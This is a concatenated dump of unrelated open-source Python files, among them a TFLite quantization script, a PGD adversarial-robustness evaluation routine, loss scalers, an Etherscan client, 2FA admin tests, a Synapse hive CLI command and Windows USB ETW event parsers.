067_MiDaS/01_float32/07_float16_quantization.py | IgiArdiyanto/PINTO_model_zoo | 1,529 | 32619 | ### tensorflow==2.3.1
import tensorflow as tf
# Float16 Quantization - Input/Output=float32
height = 384
width = 384
converter = tf.lite.TFLiteConverter.from_saved_model('saved_model')
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_model = converter.convert()
with open('midas_{}x{}_float16_quant.tflite'.format(height, width), 'wb') as w:
w.write(tflite_model)
print('Float16 Quantization complete! - midas_{}x{}_float16_quant.tflite'.format(height, width))
|
antlr-python/ChatErrorListener.py | evilkirin/antlr-mega-tutorial | 138 | 32633 | import sys
from antlr4 import *
from ChatParser import ChatParser
from ChatListener import ChatListener
from antlr4.error.ErrorListener import *
import io
class ChatErrorListener(ErrorListener):
def __init__(self, output):
self.output = output
self._symbol = ''
def syntaxError(self, recognizer, offendingSymbol, line, column, msg, e):
self.output.write(msg)
if offendingSymbol is not None:
self._symbol = offendingSymbol.text
else:
            self._symbol = recognizer.getTokenErrorDisplay(offendingSymbol)
@property
def symbol(self):
return self._symbol |
ImageNet/lib/validation.py | mhilmiasyrofi/AT_HE | 107 | 32648 | from utils import *
import torch
import sys
import numpy as np
import time
import torchvision
from torch.autograd import Variable
import torchvision.transforms as transforms
import torchvision.datasets as datasets
def validate_pgd(val_loader, model, criterion, K, step, configs, logger, save_image=False, HE=False):
# Mean/Std for normalization
mean = torch.Tensor(np.array(configs.TRAIN.mean)[:, np.newaxis, np.newaxis])
mean = mean.expand(3,configs.DATA.crop_size, configs.DATA.crop_size).cuda()
std = torch.Tensor(np.array(configs.TRAIN.std)[:, np.newaxis, np.newaxis])
std = std.expand(3, configs.DATA.crop_size, configs.DATA.crop_size).cuda()
# Initiate the meters
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
eps = configs.ADV.clip_eps
model.eval()
end = time.time()
logger.info(pad_str(' PGD eps: {}, K: {}, step: {} '.format(eps, K, step)))
if HE == True:
is_HE = '_HE'
else:
is_HE = ''
if configs.pretrained:
is_HE = '_pretrained'
for i, (input, target) in enumerate(val_loader):
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
#save original images
if save_image == True and i < 2:
original_images_save = input.clone()
for o in range(input.size(0)):
torchvision.utils.save_image(original_images_save[o, :, :, :], 'saved_images/original_images'+is_HE+'/{}.png'.format(o + configs.DATA.batch_size*i))
randn = torch.FloatTensor(input.size()).uniform_(-eps, eps).cuda()
input += randn
input.clamp_(0, 1.0)
orig_input = input.clone()
for _ in range(K):
invar = Variable(input, requires_grad=True)
in1 = invar - mean
in1.div_(std)
output = model(in1)
ascend_loss = criterion(output, target)
ascend_grad = torch.autograd.grad(ascend_loss, invar)[0]
pert = fgsm(ascend_grad, step)
            # Apply perturbation
input += pert.data
input = torch.max(orig_input-eps, input)
input = torch.min(orig_input+eps, input)
input.clamp_(0, 1.0)
#save adv images
if save_image == True and i < 2:
adv_images_save = input.clone()
for o in range(input.size(0)):
torchvision.utils.save_image(adv_images_save[o, :, :, :], 'saved_images/adv_images'+is_HE+'/{}.png'.format(o + configs.DATA.batch_size*i))
#save scaled perturbation
perturbation = input - orig_input
perturbation.clamp_(-eps,eps)
scaled_perturbation = (perturbation.clone() + eps) / (2 * eps)
scaled_perturbation.clamp_(0, 1.0)
if save_image == True and i < 2:
for o in range(input.size(0)):
torchvision.utils.save_image(scaled_perturbation[o, :, :, :], 'saved_images/scaled_perturbation'+is_HE+'/{}.png'.format(o + configs.DATA.batch_size*i))
input.sub_(mean).div_(std)
with torch.no_grad():
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(prec1[0], input.size(0))
top5.update(prec5[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % configs.TRAIN.print_freq == 0:
print('PGD Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1, top5=top5))
sys.stdout.flush()
print(' PGD Final Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg
def validate(val_loader, model, criterion, configs, logger):
# Mean/Std for normalization
mean = torch.Tensor(np.array(configs.TRAIN.mean)[:, np.newaxis, np.newaxis])
mean = mean.expand(3,configs.DATA.crop_size, configs.DATA.crop_size).cuda()
std = torch.Tensor(np.array(configs.TRAIN.std)[:, np.newaxis, np.newaxis])
std = std.expand(3, configs.DATA.crop_size, configs.DATA.crop_size).cuda()
# Initiate the meters
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
with torch.no_grad():
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
# compute output
input = input - mean
input.div_(std)
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(prec1[0], input.size(0))
top5.update(prec5[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % configs.TRAIN.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1, top5=top5))
sys.stdout.flush()
print(' Final Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg
def validate_ImagetNet_C(val_loader_name, model, criterion, configs, logger):
# Mean/Std for normalization
mean = torch.Tensor(np.array(configs.TRAIN.mean)[:, np.newaxis, np.newaxis])
mean = mean.expand(3,configs.DATA.crop_size, configs.DATA.crop_size).cuda()
std = torch.Tensor(np.array(configs.TRAIN.std)[:, np.newaxis, np.newaxis])
std = std.expand(3, configs.DATA.crop_size, configs.DATA.crop_size).cuda()
# switch to evaluate mode
model.eval()
fil_index = ['/1','/2','/3','/4','/5']
avg_return = 0
for f in fil_index:
valdir = os.path.join(configs.data, val_loader_name+f)
print(' File: ', valdir)
val_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(valdir, transforms.Compose([
transforms.Resize(configs.DATA.img_size),
transforms.CenterCrop(configs.DATA.crop_size),
transforms.ToTensor(),
])),
batch_size=configs.DATA.batch_size, shuffle=False,
num_workers=configs.DATA.workers, pin_memory=True)
# Initiate the meters
top1 = AverageMeter()
end = time.time()
for i, (input, target) in enumerate(val_loader):
with torch.no_grad():
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
# compute output
input = input - mean
input.div_(std)
output = model(input)
# measure accuracy and record loss
prec1,_ = accuracy(output, target, topk=(1,2))
top1.update(prec1[0], input.size(0))
# if i % configs.TRAIN.print_freq == 0:
# print('PGD Test: [{0}/{1}]\t'
# 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
# i, len(val_loader),top1=top1))
# print('Time: ', time.time() - end)
# sys.stdout.flush()
print('Prec: ',top1.avg.cpu().item())
avg_return += top1.avg.cpu().item()
    print('Average Classification Accuracy is: ', avg_return / 5.)
return
|
docs/examples/use_cases/video_superres/common/loss_scaler.py | cyyever/DALI | 3,967 | 32685 | <gh_stars>1000+
import torch
class LossScaler:
def __init__(self, scale=1):
self.cur_scale = scale
# `params` is a list / generator of torch.Variable
def has_overflow(self, params):
return False
# `x` is a torch.Tensor
def _has_inf_or_nan(x):
return False
# `overflow` is boolean indicating whether we overflowed in gradient
def update_scale(self, overflow):
pass
@property
def loss_scale(self):
return self.cur_scale
def scale_gradient(self, module, grad_in, grad_out):
return tuple(self.loss_scale * g for g in grad_in)
def backward(self, loss):
scaled_loss = loss*self.loss_scale
scaled_loss.backward()
class DynamicLossScaler:
def __init__(self,
init_scale=2**32,
scale_factor=2.,
scale_window=1000):
self.cur_scale = init_scale
self.cur_iter = 0
self.last_overflow_iter = -1
self.scale_factor = scale_factor
self.scale_window = scale_window
# `params` is a list / generator of torch.Variable
def has_overflow(self, params):
# return False
for p in params:
if p.grad is not None and DynamicLossScaler._has_inf_or_nan(p.grad.data):
return True
return False
# `x` is a torch.Tensor
def _has_inf_or_nan(x):
inf_count = torch.sum(x.abs() == float('inf'))
if inf_count > 0:
return True
nan_count = torch.sum(x != x)
return nan_count > 0
# `overflow` is boolean indicating whether we overflowed in gradient
def update_scale(self, overflow):
if overflow:
#self.cur_scale /= self.scale_factor
self.cur_scale = max(self.cur_scale/self.scale_factor, 1)
self.last_overflow_iter = self.cur_iter
else:
if (self.cur_iter - self.last_overflow_iter) % self.scale_window == 0:
self.cur_scale *= self.scale_factor
# self.cur_scale = 1
self.cur_iter += 1
@property
def loss_scale(self):
return self.cur_scale
def scale_gradient(self, module, grad_in, grad_out):
return tuple(self.loss_scale * g for g in grad_in)
def backward(self, loss):
scaled_loss = loss*self.loss_scale
scaled_loss.backward()
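# Minimal usage sketch (assumes `model`, `optimizer` and `loss` are already defined):
#
#   scaler = DynamicLossScaler()
#   scaler.backward(loss)                              # backward() on the scaled loss
#   overflow = scaler.has_overflow(model.parameters())
#   scaler.update_scale(overflow)                      # shrink on overflow, grow every scale_window steps
#   if not overflow:
#       for p in model.parameters():
#           if p.grad is not None:
#               p.grad.data.div_(scaler.loss_scale)    # unscale gradients before stepping
#       optimizer.step()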
|
cog/__init__.py | uniphil/cog | 158 | 32703 | <filename>cog/__init__.py
def cog():
return "Cog is alive."
|
etherscan/stats.py | adamzhang1987/py-etherscan-api | 458 | 32711 | from .client import Client
class Stats(Client):
def __init__(self, api_key='YourApiKeyToken'):
Client.__init__(self, address='', api_key=api_key)
self.url_dict[self.MODULE] = 'stats'
def get_total_ether_supply(self):
self.url_dict[self.ACTION] = 'ethsupply'
self.build_url()
req = self.connect()
return req['result']
def get_ether_last_price(self):
self.url_dict[self.ACTION] = 'ethprice'
self.build_url()
req = self.connect()
return req['result']
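# Example usage (requires a valid Etherscan API key; returned values are illustrative):
#   api = Stats(api_key='YourApiKeyToken')
#   supply = api.get_total_ether_supply()   # total supply as a numeric string
#   price = api.get_ether_last_price()      # latest price info, e.g. ETH/BTC and ETH/USD rates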
|
SimpleSign.py | wanzhiguo/mininero | 182 | 32719 | import MiniNero
import ed25519
import binascii
import PaperWallet
import cherrypy
import os
import time
import bitmonerod
import SimpleXMR2
import SimpleServer
message = "send0d000114545737471em2WCg9QKxRxbo6S3xKF2K4UDvdu6hMc"
message = "send0d0114545747771em2WCg9QKxRxbo6S3xKF2K4UDvdu6hMc"
sec = raw_input("sec?")
print(SimpleServer.Signature(message, sec))
|
tests/api/endpoints/admin/test_two_factor_auth.py | weimens/seahub | 420 | 32731 | <reponame>weimens/seahub
import os
import pytest
from django.urls import reverse
from seahub.options.models import (UserOptions, KEY_FORCE_2FA, VAL_FORCE_2FA)
from seahub.test_utils import BaseTestCase
from seahub.two_factor.models import TOTPDevice, devices_for_user
TRAVIS = 'TRAVIS' in os.environ
@pytest.mark.skipif(TRAVIS, reason="")
class TwoFactorAuthViewTest(BaseTestCase):
def setUp(self):
self.login_as(self.admin)
def test_can_disable_two_factor_auth(self):
totp = TOTPDevice(user=self.admin, name="", confirmed=1)
totp.save()
devices = devices_for_user(self.admin)
i = 0
for device in devices_for_user(self.admin):
if device:
i+=1
assert i > 0
resp = self.client.delete(reverse('two-factor-auth-view', args=[str(self.admin.username)]))
assert resp.status_code == 200
i = 0
for device in devices_for_user(self.admin):
if device:
i+=1
assert i == 0
def tearDown(self):
try:
for device in devices_for_user(self.admin):
device.delete()
except:
pass
def test_force_2fa(self):
assert len(UserOptions.objects.filter(email=self.user.email,
option_key=KEY_FORCE_2FA)) == 0
resp = self.client.put(
reverse('two-factor-auth-view', args=[self.user.username]),
'force_2fa=1',
'application/x-www-form-urlencoded',
)
self.assertEqual(200, resp.status_code)
assert len(UserOptions.objects.filter(email=self.user.email,
option_key=KEY_FORCE_2FA)) == 1
resp = self.client.put(
reverse('two-factor-auth-view', args=[self.user.username]),
'force_2fa=0',
'application/x-www-form-urlencoded',
)
self.assertEqual(200, resp.status_code)
assert len(UserOptions.objects.filter(email=self.user.email,
option_key=KEY_FORCE_2FA)) == 0
|
Introducing_CircuitPlaygroundExpress/CircuitPlaygroundExpress_LightSensor_cpx.py | joewalk102/Adafruit_Learning_System_Guides | 665 | 32781 | # CircuitPlaygroundExpress_LightSensor
# reads the on-board light sensor and graphs the brightness with NeoPixels
import time
from adafruit_circuitplayground.express import cpx
from simpleio import map_range
cpx.pixels.brightness = 0.05
while True:
# light value remaped to pixel position
peak = map_range(cpx.light, 10, 325, 0, 9)
print(cpx.light)
print(int(peak))
for i in range(0, 9, 1):
if i <= peak:
cpx.pixels[i] = (0, 255, 0)
else:
cpx.pixels[i] = (0, 0, 0)
time.sleep(0.01)
|
tests/engine/training/test_fingerprinting.py | fintzd/rasa | 9,701 | 32787 | import inspect
from unittest.mock import Mock
from _pytest.monkeypatch import MonkeyPatch
from rasa.core.policies.ted_policy import TEDPolicy
from rasa.engine.training import fingerprinting
from rasa.nlu.classifiers.diet_classifier import DIETClassifier
from rasa.nlu.selectors.response_selector import ResponseSelector
from tests.engine.training.test_components import FingerprintableText
def test_fingerprint_stays_same():
key1 = fingerprinting.calculate_fingerprint_key(
TEDPolicy, TEDPolicy.get_default_config(), {"input": FingerprintableText("Hi")},
)
key2 = fingerprinting.calculate_fingerprint_key(
TEDPolicy, TEDPolicy.get_default_config(), {"input": FingerprintableText("Hi")},
)
assert key1 == key2
def test_fingerprint_changes_due_to_class():
key1 = fingerprinting.calculate_fingerprint_key(
DIETClassifier,
TEDPolicy.get_default_config(),
{"input": FingerprintableText("Hi")},
)
key2 = fingerprinting.calculate_fingerprint_key(
ResponseSelector,
TEDPolicy.get_default_config(),
{"input": FingerprintableText("Hi")},
)
assert key1 != key2
def test_fingerprint_changes_due_to_config():
key1 = fingerprinting.calculate_fingerprint_key(
TEDPolicy, {}, {"input": FingerprintableText("Hi")},
)
key2 = fingerprinting.calculate_fingerprint_key(
ResponseSelector,
TEDPolicy.get_default_config(),
{"input": FingerprintableText("Hi")},
)
assert key1 != key2
def test_fingerprint_changes_due_to_inputs():
key1 = fingerprinting.calculate_fingerprint_key(
TEDPolicy, {}, {"input": FingerprintableText("Hi")},
)
key2 = fingerprinting.calculate_fingerprint_key(
ResponseSelector,
TEDPolicy.get_default_config(),
{"input": FingerprintableText("bye")},
)
assert key1 != key2
def test_fingerprint_changes_due_to_changed_source(monkeypatch: MonkeyPatch):
key1 = fingerprinting.calculate_fingerprint_key(
TEDPolicy, {}, {"input": FingerprintableText("Hi")},
)
get_source_mock = Mock(return_value="other implementation")
monkeypatch.setattr(inspect, inspect.getsource.__name__, get_source_mock)
key2 = fingerprinting.calculate_fingerprint_key(
TEDPolicy, {}, {"input": FingerprintableText("Hi")},
)
assert key1 != key2
get_source_mock.assert_called_once_with(TEDPolicy)
|
indra/assemblers/tsv/__init__.py | zebulon2/indra | 136 | 32798 | from .assembler import TsvAssembler
|
graphgallery/utils/ipynb.py | EdisonLeeeee/GraphGallery | 300 | 32824 | from IPython import get_ipython
from IPython.display import display
def is_ipynb():
return type(get_ipython()).__module__.startswith('ipykernel.')
|
homeassistant/components/ripple/__init__.py | domwillcode/home-assistant | 30,023 | 32833 | <gh_stars>1000+
"""The ripple component."""
|
synapse/cmds/hive.py | ackroute/synapse | 216 | 32834 | <filename>synapse/cmds/hive.py
import os
import json
import shlex
import pprint
import asyncio
import tempfile
import functools
import subprocess
import synapse.exc as s_exc
import synapse.common as s_common
import synapse.lib.cmd as s_cmd
import synapse.lib.cli as s_cli
ListHelp = '''
Lists all the keys underneath a particular key in the hive.
Syntax:
hive ls|list [path]
Notes:
If path is not specified, the root is listed.
'''
GetHelp = '''
Display or save to file the contents of a key in the hive.
Syntax:
hive get [--file] [--json] {path}
'''
DelHelp = '''
Deletes a key in the cell's hive.
Syntax:
hive rm|del {path}
Notes:
Delete will recursively delete all subkeys underneath path if they exist.
'''
EditHelp = '''
Edits or creates a key in the cell's hive.
Syntax:
hive edit|mod {path} [--string] ({value} | --editor | -f {filename})
Notes:
One may specify the value directly on the command line, from a file, or use an editor. For the --editor option,
the environment variable VISUAL or EDITOR must be set.
'''
class HiveCmd(s_cli.Cmd):
'''
Manipulates values in a cell's Hive.
A Hive is a hierarchy persistent storage mechanism typically used for configuration data.
'''
_cmd_name = 'hive'
_cmd_syntax = (
('line', {'type': 'glob'}), # type: ignore
)
def _make_argparser(self):
parser = s_cmd.Parser(prog='hive', outp=self, description=self.__doc__)
subparsers = parser.add_subparsers(title='subcommands', required=True, dest='cmd',
parser_class=functools.partial(s_cmd.Parser, outp=self))
parser_ls = subparsers.add_parser('list', aliases=['ls'], help="List entries in the hive", usage=ListHelp)
parser_ls.add_argument('path', nargs='?', help='Hive path')
parser_get = subparsers.add_parser('get', help="Get any entry in the hive", usage=GetHelp)
parser_get.add_argument('path', help='Hive path')
parser_get.add_argument('-f', '--file', default=False, action='store',
help='Save the data to a file.')
parser_get.add_argument('--json', default=False, action='store_true', help='Emit output as json')
parser_rm = subparsers.add_parser('del', aliases=['rm'], help='Delete a key in the hive', usage=DelHelp)
parser_rm.add_argument('path', help='Hive path')
parser_edit = subparsers.add_parser('edit', aliases=['mod'], help='Sets/creates a key', usage=EditHelp)
parser_edit.add_argument('--string', action='store_true', help="Edit value as a single string")
parser_edit.add_argument('path', help='Hive path')
group = parser_edit.add_mutually_exclusive_group(required=True)
group.add_argument('value', nargs='?', help='Value to set')
group.add_argument('--editor', default=False, action='store_true',
help='Opens an editor to set the value')
group.add_argument('--file', '-f', help='Copies the contents of the file to the path')
return parser
async def runCmdOpts(self, opts):
line = opts.get('line')
if line is None:
self.printf(self.__doc__)
return
core = self.getCmdItem()
try:
opts = self._make_argparser().parse_args(shlex.split(line))
except s_exc.ParserExit:
return
handlers = {
'list': self._handle_ls,
'ls': self._handle_ls,
'del': self._handle_rm,
'rm': self._handle_rm,
'get': self._handle_get,
'edit': self._handle_edit,
'mod': self._handle_edit,
}
await handlers[opts.cmd](core, opts)
@staticmethod
def parsepath(path):
''' Turn a slash-delimited path into a list that hive takes '''
return path.split('/')
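    # e.g. parsepath('auth/users') -> ['auth', 'users']; the hive API expects this list form.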
async def _handle_ls(self, core, opts):
path = self.parsepath(opts.path) if opts.path is not None else None
keys = await core.listHiveKey(path=path)
if keys is None:
self.printf('Path not found')
return
for key in keys:
self.printf(key)
async def _handle_get(self, core, opts):
path = self.parsepath(opts.path)
valu = await core.getHiveKey(path)
if valu is None:
self.printf(f'{opts.path} not present')
return
if opts.json:
prend = json.dumps(valu, indent=4, sort_keys=True)
rend = prend.encode()
elif isinstance(valu, str):
rend = valu.encode()
prend = valu
elif isinstance(valu, bytes):
rend = valu
prend = pprint.pformat(valu)
else:
rend = json.dumps(valu, indent=4, sort_keys=True).encode()
prend = pprint.pformat(valu)
if opts.file:
with s_common.genfile(opts.file) as fd:
fd.truncate(0)
fd.write(rend)
self.printf(f'Saved the hive entry [{opts.path}] to {opts.file}')
return
self.printf(f'{opts.path}:\n{prend}')
async def _handle_rm(self, core, opts):
path = self.parsepath(opts.path)
await core.popHiveKey(path)
async def _handle_edit(self, core, opts):
path = self.parsepath(opts.path)
if opts.value is not None:
if opts.value[0] not in '([{"':
data = opts.value
else:
data = json.loads(opts.value)
await core.setHiveKey(path, data)
return
elif opts.file is not None:
with open(opts.file) as fh:
s = fh.read()
if len(s) == 0:
self.printf('Empty file. Not writing key.')
return
data = s if opts.string else json.loads(s)
await core.setHiveKey(path, data)
return
editor = os.getenv('VISUAL', (os.getenv('EDITOR', None)))
if editor is None or editor == '':
self.printf('Environment variable VISUAL or EDITOR must be set for --editor')
return
tnam = None
try:
with tempfile.NamedTemporaryFile(mode='w', delete=False) as fh:
old_valu = await core.getHiveKey(path)
if old_valu is not None:
if opts.string:
if not isinstance(old_valu, str):
self.printf('Existing value is not a string, therefore not editable as a string')
return
data = old_valu
else:
try:
data = json.dumps(old_valu, indent=4, sort_keys=True)
except (ValueError, TypeError):
self.printf('Value is not JSON-encodable, therefore not editable.')
return
fh.write(data)
tnam = fh.name
while True:
retn = subprocess.call(f'{editor} {tnam}', shell=True)
if retn != 0: # pragma: no cover
self.printf('Editor failed with non-zero code. Aborting.')
return
with open(tnam) as fh:
rawval = fh.read()
if len(rawval) == 0: # pragma: no cover
self.printf('Empty file. Not writing key.')
return
try:
valu = rawval if opts.string else json.loads(rawval)
except json.JSONDecodeError as e: # pragma: no cover
self.printf(f'JSON decode failure: [{e}]. Reopening.')
await asyncio.sleep(1)
continue
# We lose the tuple/list distinction in the telepath round trip, so tuplify everything to compare
if (opts.string and valu == old_valu) or (not opts.string and s_common.tuplify(valu) == old_valu):
self.printf('Valu not changed. Not writing key.')
return
await core.setHiveKey(path, valu)
break
finally:
if tnam is not None:
os.unlink(tnam)
|
etl/parsers/etw/Microsoft_Windows_USB_USBHUB.py | IMULMUL/etl-parser | 104 | 32870 | <filename>etl/parsers/etw/Microsoft_Windows_USB_USBHUB.py
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-USB-USBHUB
GUID : 7426a56b-e2d5-4b30-bdef-b31815c1a74a
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=1, version=0)
class Microsoft_Windows_USB_USBHUB_1_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_USB_HubDescriptor" / Int64ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=2, version=0)
class Microsoft_Windows_USB_USBHUB_2_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / CString,
"fid_USBHUB_Hub" / Int32sl
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=3, version=0)
class Microsoft_Windows_USB_USBHUB_3_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_USB_HubDescriptor" / Int64ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=10, version=0)
class Microsoft_Windows_USB_USBHUB_10_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=11, version=0)
class Microsoft_Windows_USB_USBHUB_11_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=12, version=0)
class Microsoft_Windows_USB_USBHUB_12_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=13, version=0)
class Microsoft_Windows_USB_USBHUB_13_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=14, version=0)
class Microsoft_Windows_USB_USBHUB_14_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=15, version=0)
class Microsoft_Windows_USB_USBHUB_15_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=16, version=0)
class Microsoft_Windows_USB_USBHUB_16_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=17, version=0)
class Microsoft_Windows_USB_USBHUB_17_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=18, version=0)
class Microsoft_Windows_USB_USBHUB_18_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=19, version=0)
class Microsoft_Windows_USB_USBHUB_19_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=20, version=0)
class Microsoft_Windows_USB_USBHUB_20_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=21, version=0)
class Microsoft_Windows_USB_USBHUB_21_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=22, version=0)
class Microsoft_Windows_USB_USBHUB_22_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=23, version=0)
class Microsoft_Windows_USB_USBHUB_23_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=24, version=0)
class Microsoft_Windows_USB_USBHUB_24_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=25, version=0)
class Microsoft_Windows_USB_USBHUB_25_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=26, version=0)
class Microsoft_Windows_USB_USBHUB_26_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=27, version=0)
class Microsoft_Windows_USB_USBHUB_27_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=28, version=0)
class Microsoft_Windows_USB_USBHUB_28_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=29, version=0)
class Microsoft_Windows_USB_USBHUB_29_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=30, version=0)
class Microsoft_Windows_USB_USBHUB_30_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
